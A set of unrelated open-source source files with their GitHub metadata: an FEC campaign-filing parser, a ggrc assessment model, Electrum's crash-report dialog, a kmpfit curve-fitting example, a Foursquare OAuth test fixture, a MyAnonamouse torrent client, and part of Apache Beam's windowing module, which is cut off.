cmd = "select fec_id, is_superceded, data_is_processed from fec_alerts_new_filing where filing_number=%s" % (filingnum)
cursor.execute(cmd)
cd = CSV_dumper(connection)
result = cursor.fetchone()
if not result:
msg = 'process_filing_body: Couldn\'t find a new_filing for filing %s' % (filingnum)
logger.error(msg)
raise FilingHeaderDoesNotExist(msg)
# will throw a TypeError if it's missing.
header_id = 1
is_amended = result[1]
is_already_processed = result[2]
if is_already_processed:
msg = 'process_filing_body: This filing has already been entered.'
logger.error(msg)
raise FilingHeaderAlreadyProcessed(msg)
#print "Processing filing %s" % (filingnum)
try:
f1 = filing(filingnum)
except:
print "*** couldn't handle filing %s" % (filingnum)
return False
form = f1.get_form_type()
version = f1.get_version()
filer_id = f1.get_filer_id()
# only parse forms that we're set up to read
if not fp.is_allowed_form(form):
if verbose:
msg = "process_filing_body: Not a parseable form: %s - %s" % (form, filingnum)
# print msg
logger.error(msg)
return None
linenum = 0
while True:
linenum += 1
row = f1.get_body_row()
if not row:
break
#print "row is %s" % (row)
#print "\n\n\nForm is %s" % form
try:
linedict = fp.parse_form_line(row, version)
if linedict['form_type'].upper().startswith('SE'):
print "\n\n\nfiling %s form is %s transaction_id is: %s" % (filingnum, linedict['form_type'], linedict['transaction_id'])
# make sure the transaction isn't already there before entering.
try:
SkedE.objects.get(filing_number=filingnum, transaction_id=linedict['transaction_id'])
except SkedE.DoesNotExist:
process_body_row(linedict, filingnum, header_id, is_amended, cd, filer_id)
elif linedict['form_type'].upper().startswith('SA'):
print "\n\n\nfiling %s form is %s transaction_id is: %s" % (filingnum, linedict['form_type'], linedict['transaction_id'])
# make sure the transaction isn't already there before entering.
try:
SkedA.objects.get(filing_number=filingnum, transaction_id=linedict['transaction_id'])
print "Already present! %s form is %s transaction_id is: %s" % (filingnum, linedict['form_type'], linedict['transaction_id'])
except SkedA.DoesNotExist:
process_body_row(linedict, filingnum, header_id, is_amended, cd, filer_id)
elif linedict['form_type'].upper().startswith('SB'):
print "\n\n\nfiling %s form is %s transaction_id is: %s" % (filingnum, linedict['form_type'], linedict['transaction_id'])
# make sure the transaction isn't already there before entering.
try:
SkedB.objects.get(filing_number=filingnum, transaction_id=linedict['transaction_id'])
print "Already present! %s form is %s transaction_id is: %s" % (filingnum, linedict['form_type'], linedict['transaction_id'])
except SkedB.DoesNotExist:
process_body_row(linedict, filingnum, header_id, is_amended, cd, filer_id)
except ParserMissingError:
msg = 'process_filing_body: Unknown line type in filing %s line %s: type=%s Skipping.' % (filingnum, linenum, row[0])
logger.warn(msg)
continue
except KeyError:
"missing form type? in filing %s" % (filingnum)
# commit all the leftovers
cd.commit_all()
cd.close()
counter = cd.get_counter()
total_rows = 0
for i in counter:
total_rows += counter[i]
msg = "process_filing_body: Filing # %s Total rows: %s Tally is: %s" % (filingnum, total_rows, counter)
# print msg
logger.info(msg)
# don't commit during testing of fix
# this data has been moved here. At some point we should pick a single location for this data.
header_data = dict_to_hstore(counter)
cmd = "update fec_alerts_new_filing set lines_present='%s'::hstore where filing_number=%s" % (header_data, filingnum)
cursor.execute(cmd)
# mark file as having been entered.
cmd = "update fec_alerts_new_filing set data_is_processed = True where filing_number=%s" % (filingnum)
cursor.execute(cmd)
# flag this filer as one who has changed.
cmd = "update summary_data_committee_overlay set is_dirty=True where fec_id='%s'" % (filer_id)
cursor.execute(cmd)
#
if __name__ == '__main__':
#filings = new_filing.objects.filter(filing_number__gt=1007393, data_is_processed=False, filing_is_downloaded=True, header_is_processed=True)
fp = form_parser()
filings = [1010304,]
for this_filing in filings:
process_filing_body(this_filing, fp=fp)
"""
t0 = time.time()
process_filing_body(864353)
# 869853, 869866
#for fn in [869888]:
# process_filing_body(fn, fp)
t1 = time.time()
print "total time = " + str(t1-t0)
# long one: 767168
#FAILS WITH STATE ADDRESS PROBLEM: biggest one on file: 838168 (510 mb) - act blue - 2012-10-18 | 2012-11-26
# second biggest: 824988 (217.3mb) - act blue - 2012-10-01 | 2012-10-17 - 874K lines
# 840327 - 169MB C00431445 - OFA | 2012-10-18 | 2012-11-26
# 821325 - 144 mb Obama for america 2012-09-01 | 2012-09-30
# 798883 - 141 mb
# 804867 - 127 mb
# 827978 - 119 mb
# 754317 - 118 mb
"""
| {
"content_hash": "0fad1bd7049a904107da24d289da70b6",
"timestamp": "",
"source": "github",
"line_count": 244,
"max_line_length": 184,
"avg_line_length": 36.34016393442623,
"alnum_prop": 0.6205029886094507,
"repo_name": "sunlightlabs/read_FEC",
"id": "b1f69bbb169ef792e15f60ea36b07971ff2d6b9c",
"size": "8942",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fecreader/formdata/utils/filing_body_processor_fix_hack.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "27432"
},
{
"name": "HTML",
"bytes": "357960"
},
{
"name": "JavaScript",
"bytes": "129989"
},
{
"name": "Python",
"bytes": "1881514"
},
{
"name": "Shell",
"bytes": "10604"
}
],
"symlink_target": ""
} |
"""Module for Assessment object"""
from sqlalchemy import and_
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import remote
from sqlalchemy.orm import validates
from ggrc import db
from ggrc.models import reflection
from ggrc.models.audit import Audit
from ggrc.models.comment import Commentable
from ggrc.models.custom_attribute_definition import CustomAttributeDefinition
from ggrc.models.mixins import BusinessObject
from ggrc.models.mixins import CustomAttributable
from ggrc.models.mixins import FinishedDate
from ggrc.models.mixins import Notifiable
from ggrc.models.mixins import TestPlanned
from ggrc.models.mixins import Timeboxed
from ggrc.models.mixins import VerifiedDate
from ggrc.models.mixins import reminderable
from ggrc.models.mixins import statusable
from ggrc.models.mixins.assignable import Assignable
from ggrc.models.mixins.autostatuschangeable import AutoStatusChangeable
from ggrc.models.mixins.validate_on_complete import ValidateOnComplete
from ggrc.models.mixins.with_similarity_score import WithSimilarityScore
from ggrc.models.deferred import deferred
from ggrc.models.object_document import EvidenceURL
from ggrc.models.object_person import Personable
from ggrc.models.reflection import PublishOnly
from ggrc.models.relationship import Relatable
from ggrc.models.relationship import Relationship
from ggrc.models.track_object_state import HasObjectState
class AuditRelationship(object):
"""Mixin for mandatory link to an Audit via Relationships."""
_aliases = {
"audit": {
"display_name": "Audit",
"mandatory": True,
"filter_by": "_filter_by_audit",
"ignore_on_update": True,
"type": reflection.AttributeInfo.Type.MAPPING,
},
}
@classmethod
def _filter_by_audit(cls, predicate):
"""Get filter for objects related to an Audit."""
return Relationship.query.filter(
Relationship.source_type == cls.__name__,
Relationship.source_id == cls.id,
Relationship.destination_type == Audit.__name__,
).join(Audit, Relationship.destination_id == Audit.id).filter(
predicate(Audit.slug)
).exists() | Relationship.query.filter(
Relationship.destination_type == cls.__name__,
Relationship.destination_id == cls.id,
Relationship.source_type == Audit.__name__,
).join(Audit, Relationship.source_id == Audit.id).filter(
predicate(Audit.slug)
).exists()
class Assessment(statusable.Statusable, AuditRelationship,
AutoStatusChangeable, Assignable, HasObjectState, TestPlanned,
CustomAttributable, EvidenceURL, Commentable, Personable,
reminderable.Reminderable, Timeboxed, Relatable,
WithSimilarityScore, FinishedDate, VerifiedDate,
ValidateOnComplete, Notifiable, BusinessObject, db.Model):
"""Class representing Assessment.
Assessment is an object representing an individual assessment performed on
a specific object during an audit to ascertain whether or not
certain conditions were met for that object.
"""
__tablename__ = 'assessments'
_title_uniqueness = False
ASSIGNEE_TYPES = (u"Creator", u"Assessor", u"Verifier")
REMINDERABLE_HANDLERS = {
"statusToPerson": {
"handler":
reminderable.Reminderable.handle_state_to_person_reminder,
"data": {
statusable.Statusable.START_STATE: "Assessor",
"In Progress": "Assessor"
},
"reminders": {"assessment_assessor_reminder", }
}
}
design = deferred(db.Column(db.String), "Assessment")
operationally = deferred(db.Column(db.String), "Assessment")
@declared_attr
def object_level_definitions(self):
"""Set up a backref so that we can create an object level custom
attribute definition without the need to do a flush to get the
assessment id.
This is used in the relate_ca method in hooks/assessment.py.
"""
return db.relationship(
'CustomAttributeDefinition',
primaryjoin=lambda: and_(
remote(CustomAttributeDefinition.definition_id) == Assessment.id,
remote(CustomAttributeDefinition.definition_type) == "assessment"),
foreign_keys=[
CustomAttributeDefinition.definition_id,
CustomAttributeDefinition.definition_type
],
backref='assessment_definition',
cascade='all, delete-orphan')
object = {} # we add this for the sake of client side error checking
audit = {}
VALID_CONCLUSIONS = frozenset([
"Effective",
"Ineffective",
"Needs improvement",
"Not Applicable"
])
# REST properties
_publish_attrs = [
'design',
'operationally',
PublishOnly('audit'),
PublishOnly('object')
]
_tracked_attrs = {
'contact_id',
'description',
'design',
'notes',
'operationally',
'reference_url',
'secondary_contact_id',
'test_plan',
'title',
'url',
'start_date',
'end_date'
}
_aliases = {
"owners": None,
"assessment_template": {
"display_name": "Template",
"ignore_on_update": True,
"filter_by": "_ignore_filter",
"type": reflection.AttributeInfo.Type.MAPPING,
},
"url": "Assessment URL",
"design": "Conclusion: Design",
"operationally": "Conclusion: Operation",
"related_creators": {
"display_name": "Creator",
"mandatory": True,
"filter_by": "_filter_by_related_creators",
"type": reflection.AttributeInfo.Type.MAPPING,
},
"related_assessors": {
"display_name": "Assessor",
"mandatory": True,
"filter_by": "_filter_by_related_assessors",
"type": reflection.AttributeInfo.Type.MAPPING,
},
"related_verifiers": {
"display_name": "Verifier",
"filter_by": "_filter_by_related_verifiers",
"type": reflection.AttributeInfo.Type.MAPPING,
},
}
similarity_options = {
"relevant_types": {
"Objective": {"weight": 2},
"Control": {"weight": 2},
},
"threshold": 1,
}
def validate_conclusion(self, value):
return value if value in self.VALID_CONCLUSIONS else ""
@validates("operationally")
def validate_opperationally(self, key, value):
# pylint: disable=unused-argument
return self.validate_conclusion(value)
@validates("design")
def validate_design(self, key, value):
# pylint: disable=unused-argument
return self.validate_conclusion(value)
@classmethod
def _filter_by_related_creators(cls, predicate):
return cls._get_relate_filter(predicate, "Creator")
@classmethod
def _filter_by_related_assessors(cls, predicate):
return cls._get_relate_filter(predicate, "Assessor")
@classmethod
def _filter_by_related_verifiers(cls, predicate):
return cls._get_relate_filter(predicate, "Verifier")
@classmethod
def _ignore_filter(cls, _):
return None
| {
"content_hash": "ba139ed58a2c07d861b046b355e0ead4",
"timestamp": "",
"source": "github",
"line_count": 218,
"max_line_length": 79,
"avg_line_length": 32.5,
"alnum_prop": 0.6681721947776994,
"repo_name": "selahssea/ggrc-core",
"id": "5462a35cef5176b3de0eda86377d00aef4f8aa31",
"size": "7198",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "src/ggrc/models/assessment.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "211857"
},
{
"name": "HTML",
"bytes": "1056523"
},
{
"name": "JavaScript",
"bytes": "1852333"
},
{
"name": "Makefile",
"bytes": "7044"
},
{
"name": "Mako",
"bytes": "4320"
},
{
"name": "Python",
"bytes": "2613417"
},
{
"name": "Shell",
"bytes": "31273"
}
],
"symlink_target": ""
} |
import platform
import sys
import traceback
from PyQt5.QtCore import QObject
import PyQt5.QtCore as QtCore
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import *
from electrum.i18n import _
from electrum.base_crash_reporter import BaseCrashReporter
from .util import MessageBoxMixin
class Exception_Window(BaseCrashReporter, QWidget, MessageBoxMixin):
_active_window = None
def __init__(self, main_window, exctype, value, tb):
BaseCrashReporter.__init__(self, exctype, value, tb)
self.main_window = main_window
QWidget.__init__(self)
self.setWindowTitle('Electrum - ' + _('An Error Occurred'))
self.setMinimumSize(600, 300)
main_box = QVBoxLayout()
heading = QLabel('<h2>' + BaseCrashReporter.CRASH_TITLE + '</h2>')
main_box.addWidget(heading)
main_box.addWidget(QLabel(BaseCrashReporter.CRASH_MESSAGE))
main_box.addWidget(QLabel(BaseCrashReporter.REQUEST_HELP_MESSAGE))
collapse_info = QPushButton(_("Show report contents"))
collapse_info.clicked.connect(
lambda: self.msg_box(QMessageBox.NoIcon,
self, _("Report contents"), self.get_report_string()))
main_box.addWidget(collapse_info)
main_box.addWidget(QLabel(BaseCrashReporter.DESCRIBE_ERROR_MESSAGE))
self.description_textfield = QTextEdit()
self.description_textfield.setFixedHeight(50)
main_box.addWidget(self.description_textfield)
main_box.addWidget(QLabel(BaseCrashReporter.ASK_CONFIRM_SEND))
buttons = QHBoxLayout()
report_button = QPushButton(_('Send Bug Report'))
report_button.clicked.connect(self.send_report)
report_button.setIcon(QIcon(":icons/tab_send.png"))
buttons.addWidget(report_button)
never_button = QPushButton(_('Never'))
never_button.clicked.connect(self.show_never)
buttons.addWidget(never_button)
close_button = QPushButton(_('Not Now'))
close_button.clicked.connect(self.close)
buttons.addWidget(close_button)
main_box.addLayout(buttons)
self.setLayout(main_box)
self.show()
def send_report(self):
try:
proxy = self.main_window.network.proxy
response = BaseCrashReporter.send_report(self, self.main_window.network.asyncio_loop, proxy)
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.main_window.show_critical(_('There was a problem with the automatic reporting:') + '\n' +
str(e) + '\n' +
_("Please report this issue manually."))
return
QMessageBox.about(self, _("Crash report"), response)
self.close()
def on_close(self):
Exception_Window._active_window = None
sys.__excepthook__(*self.exc_args)
self.close()
def show_never(self):
self.main_window.config.set_key(BaseCrashReporter.config_key, False)
self.close()
def closeEvent(self, event):
self.on_close()
event.accept()
def get_user_description(self):
return self.description_textfield.toPlainText()
def get_wallet_type(self):
return self.main_window.wallet.wallet_type
def get_os_version(self):
return platform.platform()
def _show_window(*args):
if not Exception_Window._active_window:
Exception_Window._active_window = Exception_Window(*args)
class Exception_Hook(QObject):
_report_exception = QtCore.pyqtSignal(object, object, object, object)
def __init__(self, main_window, *args, **kwargs):
super(Exception_Hook, self).__init__(*args, **kwargs)
if not main_window.config.get(BaseCrashReporter.config_key, default=True):
return
self.main_window = main_window
sys.excepthook = self.handler
self._report_exception.connect(_show_window)
def handler(self, *args):
self._report_exception.emit(self.main_window, *args)
| {
"content_hash": "2a966cd0b939fb0d642a00273ca7e535",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 106,
"avg_line_length": 33.532786885245905,
"alnum_prop": 0.6418968467367392,
"repo_name": "cryptapus/electrum",
"id": "1d30b3eea8720b2e0de3facd338e4502e2ba99a8",
"size": "5216",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "electrum/gui/qt/exception_window.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "1169"
},
{
"name": "GLSL",
"bytes": "289"
},
{
"name": "Java",
"bytes": "1574"
},
{
"name": "Makefile",
"bytes": "874"
},
{
"name": "NSIS",
"bytes": "7316"
},
{
"name": "Python",
"bytes": "2195369"
},
{
"name": "Shell",
"bytes": "20819"
}
],
"symlink_target": ""
} |
import numpy
from kmpfit import kmpfit
def residuals(p, data): # Residuals function needed by kmpfit
x, y = data # Data arrays is a tuple given by programmer
a, b = p # Parameters which are adjusted by kmpfit
return (y-(a+b*x))
d = numpy.array([42, 6.75, 25, 33.8, 9.36, 21.8, 5.58, 8.52, 15.1])
v = numpy.array([1294, 462, 2562, 2130, 750, 2228, 598, 224, 971])
paramsinitial = [0, 70.0]
fitobj = kmpfit.Fitter(residuals=residuals, data=(d,v))
fitobj.fit(params0=paramsinitial)
print "\nFit status kmpfit:"
print "===================="
print "Best-fit parameters: ", fitobj.params
print "Asymptotic error: ", fitobj.xerror
print "Error assuming red.chi^2=1: ", fitobj.stderr
print "Chi^2 min: ", fitobj.chi2_min
print "Reduced Chi^2: ", fitobj.rchi2_min
print "Iterations: ", fitobj.niter
print "Number of free pars.: ", fitobj.nfree
print "Degrees of freedom: ", fitobj.dof | {
"content_hash": "bb8b117f1362f168425f1fe865c2fc2b",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 69,
"avg_line_length": 39.56,
"alnum_prop": 0.6147623862487361,
"repo_name": "aoeftiger/kmpfit",
"id": "240f7e5231a675f9897753bf16e80d2da57abe11",
"size": "989",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kmpfit/example.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "69175"
},
{
"name": "Python",
"bytes": "33389"
}
],
"symlink_target": ""
} |
import calendar
import re
import fixtures
import constants
from authomatic.providers import oauth2
conf = fixtures.get_configuration('foursquare')
CONFIG = {
'logout_url': 'https://foursquare.com/logout',
'login_xpath': '//*[@id="username"]',
'password_xpath': '//*[@id="password"]',
'consent_xpaths': [],
'class_': oauth2.Foursquare,
'scope': oauth2.Foursquare.user_info_scope,
'user': {
'birth_date': conf.user_birth_date_str,
'city': conf.user_city,
'country': conf.user_country,
'email': conf.user_email,
'first_name': conf.user_first_name,
'gender': conf.user_gender,
'id': conf.user_id,
'last_name': conf.user_last_name,
'link': None,
'locale': None,
'location': conf.user_location,
'name': conf.user_name,
'nickname': None,
'phone': conf.user_phone,
'picture': re.compile(r'^https://\w+\.\w+\.net/img/user/\w+\.jpg$'),
'postal_code': None,
'timezone': None,
'username': None,
},
'content_should_contain': [
str(calendar.timegm(conf.user_birth_date.timetuple())), # Timestamp
conf.user_city,
conf.user_country,
conf.user_email,
conf.user_first_name,
conf.user_gender,
conf.user_id,
conf.user_last_name,
conf.user_phone,
# User info JSON keys
'address', 'allowMenuUrlEdit', 'bio', 'birthday', 'blockedStatus',
'canonicalUrl', 'categories', 'cc', 'checkin', 'checkinPings',
'checkins', 'checkinsCount', 'city', 'code', 'collaborative',
'comments', 'contact', 'count', 'country', 'createdAt', 'default',
'description', 'editable', 'email', 'entities', 'facebook',
'facebookName', 'firstName', 'formattedAddress', 'formattedPhone',
'friends', 'gender', 'groups', 'height', 'homeCity', 'icon', 'id',
'isMayor', 'item', 'items', 'lastName', 'lat', 'lenses', 'like',
'likes', 'listItems', 'lists', 'lng', 'location', 'mayorships', 'meta',
'name', 'neighborhood', 'notifications', 'phone', 'photo', 'photos',
'pings', 'pluralName', 'postalCode', 'posts', 'prefix', 'primary',
'public', 'referralId', 'relationship', 'requestId', 'requests',
'response', 'shortName', 'shout', 'source', 'state', 'stats', 'suffix',
'superuser', 'textCount', 'timeZoneOffset', 'tipCount', 'tips',
'twitter', 'type', 'unreadCount', 'url', 'user', 'usersCount', 'venue',
'verified', 'verifiedPhone', 'visibility', 'width'
],
# Case insensitive
'content_should_not_contain': [
'locale',
'language',
'deprecated',
conf.user_postal_code,
conf.user_username_reverse
],
# True means that any thruthy value is expected
'credentials': {
'token_type': None,
'provider_type_id': '2-6',
'_expiration_time': None,
'consumer_key': None,
'provider_id': None,
'consumer_secret': None,
'token': True,
'token_secret': None,
'_expire_in': True,
'provider_name': 'foursquare',
'refresh_token': None,
'provider_type': 'authomatic.providers.oauth2.OAuth2',
'refresh_status': constants.CREDENTIALS_REFRESH_NOT_SUPPORTED,
},
}
| {
"content_hash": "71f9d374d0ea7c17fa8aad49c43858b2",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 79,
"avg_line_length": 36.78021978021978,
"alnum_prop": 0.5703615177771139,
"repo_name": "peterhudec/authomatic",
"id": "c1e9295b4ce5299c1ef8a7bdcc59a6d9f0778fae",
"size": "3371",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/functional_tests/expected_values/foursquare.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CoffeeScript",
"bytes": "13463"
},
{
"name": "HTML",
"bytes": "5436"
},
{
"name": "Python",
"bytes": "363520"
},
{
"name": "Shell",
"bytes": "1336"
}
],
"symlink_target": ""
} |
import re
import requests
import pickle
import time
from myanonamouse.models import MAMLoginCache
from myanonamouse.settings import MAM_USERNAME, MAM_PASSWORD, MAM_LOGIN_URL, MAM_ROOT_URL
class MAMException(Exception):
pass
class LoginException(MAMException):
pass
def process_url(url):
if url.startswith('http://') or url.startswith('https://'):
return url
elif url.startswith('//'):
return 'http:' + url
elif url.startswith('/'):
return MAM_ROOT_URL + url
else:
return MAM_ROOT_URL + '/' + url
class MAMClient(object):
def __init__(self, username, password):
self.username = username
self.password = password
self.session = requests.Session()
try:
login_cache = MAMLoginCache.objects.get()
for cookie in pickle.loads(login_cache.cookies):
self.session.cookies.set_cookie(cookie)
except MAMLoginCache.DoesNotExist:
pass
def _login(self):
data = {
'username': self.username,
'password': self.password,
}
r = self.session.post(process_url(MAM_LOGIN_URL), data=data, allow_redirects=False)
if r.status_code != 302:
raise LoginException()
if r.headers['location'] != '/index.php':
raise LoginException()
MAMLoginCache.objects.all().delete()
login_cache = MAMLoginCache(cookies=pickle.dumps([c for c in self.session.cookies]))
login_cache.save()
def _request(self, url, try_login):
resp = self.session.request('GET', url, allow_redirects=False)
if resp.status_code == 302:
if resp.headers['location'].startswith('/login.php?'):
if try_login:
self._login()
return self._request(url, try_login=False)
else:
raise LoginException()
else:
raise MAMException('Request redirect: {0}'.format(resp.headers['location']))
elif resp.status_code != 200:
raise MAMException()
return resp
def request(self, url):
return self._request(process_url(url), try_login=True)
def download_torrent(self, torrent_url):
for i in xrange(3):
try:
r = self.request(torrent_url)
if 'application/x-bittorrent' in r.headers['content-type']:
filename = re.search('filename="(.*)"',
r.headers['content-disposition']).group(1)
return filename, r.content
else:
raise Exception('Wrong status_code or content-type')
except Exception as ex:
print u'Error while download MAM torrent. Will retry: {0}'.format(ex)
time.sleep(3)
download_exception = ex
raise download_exception
@staticmethod
def get():
return MAMClient(MAM_USERNAME, MAM_PASSWORD)
| {
"content_hash": "44f2f53f378fe409e7986aa9933683df",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 92,
"avg_line_length": 33.31868131868132,
"alnum_prop": 0.570910290237467,
"repo_name": "MADindustries/WhatManager2",
"id": "75d7a557611090f31785eef9e42b814ad1a9f388",
"size": "3032",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "myanonamouse/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "202636"
},
{
"name": "HTML",
"bytes": "139705"
},
{
"name": "JavaScript",
"bytes": "632927"
},
{
"name": "Python",
"bytes": "508225"
},
{
"name": "Shell",
"bytes": "2294"
}
],
"symlink_target": ""
} |
"""Windowing concepts.
A WindowInto transform logically divides up or groups the elements of a
PCollection into finite windows according to a windowing function (derived from
WindowFn).
The output of WindowInto contains the same elements as input, but they have been
logically assigned to windows. The next GroupByKey(s) transforms, including one
within a composite transform, will group by the combination of keys and windows.
Windowing a PCollection allows chunks of it to be processed individually, before
the entire PCollection is available. This is especially important for
PCollection(s) with unbounded size, since the full PCollection is never
available at once, since more data is continually arriving. For PCollection(s)
with a bounded size (aka. conventional batch mode), by default, all data is
implicitly in a single window (see GlobalWindows), unless WindowInto is
applied.
For example, a simple form of windowing divides up the data into fixed-width
time intervals, using FixedWindows.
Seconds are used as the time unit for the built-in windowing primitives here.
Integer or floating point seconds can be passed to these primitives.
Internally, seconds, with microsecond granularity, are stored as
timeutil.Timestamp and timeutil.Duration objects. This is done to avoid
precision errors that would occur with floating point representations.
Custom windowing function classes can be created, by subclassing from
WindowFn.
"""
from __future__ import absolute_import
import abc
from google.protobuf import struct_pb2
from apache_beam.coders import coders
from apache_beam.runners.api import beam_runner_api_pb2
from apache_beam.transforms import timeutil
from apache_beam.utils import proto_utils
from apache_beam.utils import urns
from apache_beam.utils.timestamp import Duration
from apache_beam.utils.timestamp import MAX_TIMESTAMP
from apache_beam.utils.timestamp import MIN_TIMESTAMP
from apache_beam.utils.timestamp import Timestamp
from apache_beam.utils.windowed_value import WindowedValue
__all__ = [
'TimestampCombiner',
'WindowFn',
'BoundedWindow',
'IntervalWindow',
'TimestampedValue',
'GlobalWindow',
'NonMergingWindowFn',
'GlobalWindows',
'FixedWindows',
'SlidingWindows',
'Sessions',
]
# TODO(ccy): revisit naming and semantics once Java Apache Beam finalizes their
# behavior.
class TimestampCombiner(object):
"""Determines how output timestamps of grouping operations are assigned."""
OUTPUT_AT_EOW = beam_runner_api_pb2.END_OF_WINDOW
OUTPUT_AT_EARLIEST = beam_runner_api_pb2.EARLIEST_IN_PANE
OUTPUT_AT_LATEST = beam_runner_api_pb2.LATEST_IN_PANE
# TODO(robertwb): Add this to the runner API or remove it.
OUTPUT_AT_EARLIEST_TRANSFORMED = 'OUTPUT_AT_EARLIEST_TRANSFORMED'
@staticmethod
def get_impl(timestamp_combiner, window_fn):
if timestamp_combiner == TimestampCombiner.OUTPUT_AT_EOW:
return timeutil.OutputAtEndOfWindowImpl()
elif timestamp_combiner == TimestampCombiner.OUTPUT_AT_EARLIEST:
return timeutil.OutputAtEarliestInputTimestampImpl()
elif timestamp_combiner == TimestampCombiner.OUTPUT_AT_LATEST:
return timeutil.OutputAtLatestInputTimestampImpl()
elif timestamp_combiner == TimestampCombiner.OUTPUT_AT_EARLIEST_TRANSFORMED:
return timeutil.OutputAtEarliestTransformedInputTimestampImpl(window_fn)
else:
raise ValueError('Invalid TimestampCombiner: %s.' % timestamp_combiner)
class WindowFn(urns.RunnerApiFn):
"""An abstract windowing function defining a basic assign and merge."""
__metaclass__ = abc.ABCMeta
class AssignContext(object):
"""Context passed to WindowFn.assign()."""
def __init__(self, timestamp, element=None):
self.timestamp = Timestamp.of(timestamp)
self.element = element
@abc.abstractmethod
def assign(self, assign_context):
"""Associates a timestamp to an element."""
raise NotImplementedError
class MergeContext(object):
"""Context passed to WindowFn.merge() to perform merging, if any."""
def __init__(self, windows):
self.windows = list(windows)
def merge(self, to_be_merged, merge_result):
raise NotImplementedError
@abc.abstractmethod
def merge(self, merge_context):
"""Returns a window that is the result of merging a set of windows."""
raise NotImplementedError
def is_merging(self):
"""Returns whether this WindowFn merges windows."""
return True
@abc.abstractmethod
def get_window_coder(self):
raise NotImplementedError
def get_transformed_output_time(self, window, input_timestamp): # pylint: disable=unused-argument
"""Given input time and output window, returns output time for window.
If TimestampCombiner.OUTPUT_AT_EARLIEST_TRANSFORMED is used in the
Windowing, the output timestamp for the given window will be the earliest
of the timestamps returned by get_transformed_output_time() for elements
of the window.
Arguments:
window: Output window of element.
input_timestamp: Input timestamp of element as a timeutil.Timestamp
object.
Returns:
Transformed timestamp.
"""
# By default, just return the input timestamp.
return input_timestamp
urns.RunnerApiFn.register_pickle_urn(urns.PICKLED_WINDOW_FN)
class BoundedWindow(object):
"""A window for timestamps in range (-infinity, end).
Attributes:
end: End of window.
"""
def __init__(self, end):
self.end = Timestamp.of(end)
def max_timestamp(self):
return self.end.predecessor()
def __cmp__(self, other):
# Order first by endpoint, then arbitrarily.
return cmp(self.end, other.end) or cmp(hash(self), hash(other))
def __eq__(self, other):
raise NotImplementedError
def __hash__(self):
return hash(self.end)
def __repr__(self):
return '[?, %s)' % float(self.end)
class IntervalWindow(BoundedWindow):
"""A window for timestamps in range [start, end).
Attributes:
start: Start of window as seconds since Unix epoch.
end: End of window as seconds since Unix epoch.
"""
def __init__(self, start, end):
super(IntervalWindow, self).__init__(end)
self.start = Timestamp.of(start)
def __hash__(self):
return hash((self.start, self.end))
def __eq__(self, other):
return self.start == other.start and self.end == other.end
def __repr__(self):
return '[%s, %s)' % (float(self.start), float(self.end))
def intersects(self, other):
return other.start < self.end or self.start < other.end
def union(self, other):
return IntervalWindow(
min(self.start, other.start), max(self.end, other.end))
class TimestampedValue(object):
"""A timestamped value having a value and a timestamp.
Attributes:
value: The underlying value.
timestamp: Timestamp associated with the value as seconds since Unix epoch.
"""
def __init__(self, value, timestamp):
self.value = value
self.timestamp = Timestamp.of(timestamp)
def __cmp__(self, other):
if type(self) is not type(other):
return cmp(type(self), type(other))
return cmp((self.value, self.timestamp), (other.value, other.timestamp))
class GlobalWindow(BoundedWindow):
"""The default window into which all data is placed (via GlobalWindows)."""
_instance = None
def __new__(cls):
if cls._instance is None:
cls._instance = super(GlobalWindow, cls).__new__(cls)
return cls._instance
def __init__(self):
super(GlobalWindow, self).__init__(MAX_TIMESTAMP)
self.start = MIN_TIMESTAMP
def __repr__(self):
return 'GlobalWindow'
def __hash__(self):
return hash(type(self))
def __eq__(self, other):
# Global windows are always and only equal to each other.
return self is other or type(self) is type(other)
class NonMergingWindowFn(WindowFn):
def is_merging(self):
return False
def merge(self, merge_context):
pass # No merging.
class GlobalWindows(NonMergingWindowFn):
"""A windowing function that assigns everything to one global window."""
@classmethod
def windowed_value(cls, value, timestamp=MIN_TIMESTAMP):
return WindowedValue(value, timestamp, (GlobalWindow(),))
def assign(self, assign_context):
return [GlobalWindow()]
def get_window_coder(self):
return coders.GlobalWindowCoder()
def __hash__(self):
return hash(type(self))
def __eq__(self, other):
# Global windowfn is always and only equal to each other.
return self is other or type(self) is type(other)
def __ne__(self, other):
return not self == other
def to_runner_api_parameter(self, context):
return urns.GLOBAL_WINDOWS_FN, None
@urns.RunnerApiFn.register_urn(urns.GLOBAL_WINDOWS_FN, None)
def from_runner_api_parameter(unused_fn_parameter, unused_context):
return GlobalWindows()
class FixedWindows(NonMergingWindowFn):
"""A windowing function that assigns each element to one time interval.
The attributes size and offset determine in what time interval a timestamp
will be slotted. The time intervals have the following formula:
[N * size + offset, (N + 1) * size + offset)
Attributes:
size: Size of the window as seconds.
offset: Offset of this window as seconds since Unix epoch. Windows start at
t=N * size + offset where t=0 is the epoch. The offset must be a value
in range [0, size). If it is not it will be normalized to this range.
"""
def __init__(self, size, offset=0):
if size <= 0:
raise ValueError('The size parameter must be strictly positive.')
self.size = Duration.of(size)
self.offset = Timestamp.of(offset) % self.size
def assign(self, context):
timestamp = context.timestamp
start = timestamp - (timestamp - self.offset) % self.size
return [IntervalWindow(start, start + self.size)]
def get_window_coder(self):
return coders.IntervalWindowCoder()
def __eq__(self, other):
if type(self) == type(other) == FixedWindows:
return self.size == other.size and self.offset == other.offset
def __ne__(self, other):
return not self == other
